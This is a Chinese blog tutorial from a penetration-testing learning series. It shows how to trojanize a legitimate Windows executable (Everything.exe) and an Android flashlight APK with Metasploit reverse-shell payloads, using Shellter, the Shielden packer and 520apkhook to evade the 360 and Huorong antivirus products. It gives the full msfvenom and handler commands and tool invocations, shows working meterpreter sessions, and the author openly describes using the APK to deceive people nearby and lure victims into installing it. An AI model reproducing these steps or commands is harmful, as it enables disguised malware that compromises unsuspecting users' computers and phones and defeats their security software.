MSF(3)——apk和exe的加马(过360、火绒)

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀

工具地址

shielden

http://www.safengine.com/download/release.zip

520apkhook

https://github.com/cleverbao/520apkhook

exe 加马

我先前写的文章里免杀exe马的方式生成四个文件,上传的时候非常麻烦,而且python的meterpreter功能很少,一般在实际情况中需要上传exe马进行进一步控制,但是传一个exe马上去,不仅会被瞬间秒杀,还会被杀软断开连接,于是就有了以下的内容。

大致流程是先给一个正常的exe文件加后门,然后给他加壳。这样过杀软基本问题就不太大了。

先用kali生成一个exe的马,192.168.220.129是我kali的地址

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.220.129 lport=4444 -f exe -o shell.exe

使用杀毒软件扫描该文件
火绒
在这里插入图片描述
360
在这里插入图片描述

shellter附加

大概意思是把木马里的代码插入到正常的可执行文件中,这样增加木马的混淆性,使其达到免杀的效果。

安装

在这里用shellter工具。

新版的kali没有shellter了,所以要自己安装。

以下代码建议先sudo后用root执行。

apt-get update
apt-get install shellter
dpkg --add-architecture i386 && apt-get update && apt-get install wine32

安装好后直接在控制台输入shellter,显示如下即为安装完成
在这里插入图片描述

软件准备

先要准备一个32位的PE文件,尽量小一些,方便上传。

必须是32位

在这里我选用32位everything.exe,可点该链接下载

下载好以后是一个压缩包,解压之后把里面的everything.exe放到kali中
在这里插入图片描述
在这里插入图片描述

添加后门

启动shellter后,在选择模式后选择A,自动模式

这里要你输入PE文件的路径,直接输everything的绝对路径就好了
在这里插入图片描述
等待数分钟后,要选择是否启用隐身模式这里选择N
在这里插入图片描述
接下来按下图填就好了
在这里插入图片描述
在这里输入攻击机ip和监听端口,然后稍等一下生成木马
在这里插入图片描述
在这里插入图片描述
这个时候木马就已经生成成功了,生成的木马替换了原本PE文件的位置,原本的PE文件存在Shellter_Backups
在这里插入图片描述

杀软测试

分别测试火绒和360
360
在这里插入图片描述
火绒
在这里插入图片描述
此时已经可以过360了

加壳

加壳用到的工具是Shielden

下载下来的Shielden是一个叫release的文件夹,直接运行里面的Shielden.exe即可,运行图如下
在这里插入图片描述

使用

这个工具非常简单,无脑操作即可

点击浏览,导入插入木马的Everything.exe
在这里插入图片描述
检测选项的箭头全部打上
在这里插入图片描述
保护选项的箭头全打上
在这里插入图片描述
CheatDefender的箭头全打上
在这里插入图片描述
点击保护生成加壳后的文件

生成后的文件会在源文件名字后加上_se

生成的文件名为Everything_se.exe
在这里插入图片描述

杀软测试

360
在这里插入图片描述
火绒
在这里插入图片描述
此时已经可以绕过360和火绒了

连接测试

接下来测试一下能否正常使用

kali中msf设置如下

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.220.129
set lport 4444
run

可以看到,成功收到了回显
在这里插入图片描述

apk加马

本来我是不想做这个的,但是拿着这个马对周围的人坑蒙拐骗使人实在心情愉悦。于是就有了以下的部分。

大致流程就是先准备一个正常的apk文件,然后给他附加shellcode,当受害者运行该文件,就会执行shellcode,从而被控制。

由于以下的全部操作都是真实环境,所以在这里我使用了内网穿透和端口转发技术,具体的操作我心情好可能会写,再这里我的ip和端口都打码或用其他数据代替。能明白原理就行了。

先生成一个apk的马

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.220.129 lport=6666 R>1.apk

使用杀毒软件扫描该文件
火绒
在这里插入图片描述
手机管家
在这里插入图片描述

520apkhook加马

520apkhook是一款基于python3和Java的代码注入工具。用作者的话说是

将msf生成的payload,注入到一个正常的apk文件中,重新打包后进行加固,bypass手机安全管家的检测。

使用该工具加马,要自己先准备一个apk文件,可以到网上去下那种小工具的apk文件,文件相对比较小,也比较容易诱骗。

在这里我准备了一个手电筒的apk
在这里插入图片描述

使用

把apk文件改个名字,放到kali中,方便后期加马

例如我在这里将其改名为flash.apk,并且放到 /home/kali/520apkhook/ 目录下
在这里插入图片描述
接下来直接执行如下代码

python main.py --lhost 192.168.220.129 --lport 6666 -n /home/kali/520apkhook/flash.apk

其中lhost填你自己的ip,lport填你自己监听的端口

如下图即为生成成功
在这里插入图片描述

此时在WorkDir目录下生成如下文件

在这里插入图片描述
这个AllFinish.apk就是加马的apk文件

将其改名为手电筒,方便进行下一步诱骗下载

在这里我就不改名了,并且直接转移到android上

这个handler.rc是msf的执行文件,如果是内网穿透需要手动修改内容

在这里插入图片描述
接下来终端运行msfconsole -r handler.rc打开msf控制台并自动监听
在这里插入图片描述

测试连接

在android手机上运行该apk文件

只是提示签名不一致,继续安装,并运行该文件。
在这里插入图片描述
在这里插入图片描述
也是成功收到连接,得到meterpreter.

在这里插入图片描述
获取系统信息

杀软测试

测试火绒
在这里插入图片描述
火绒不报毒

  • 11
    点赞
  • 78
    收藏
    觉得还不错? 一键收藏
  • 10
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值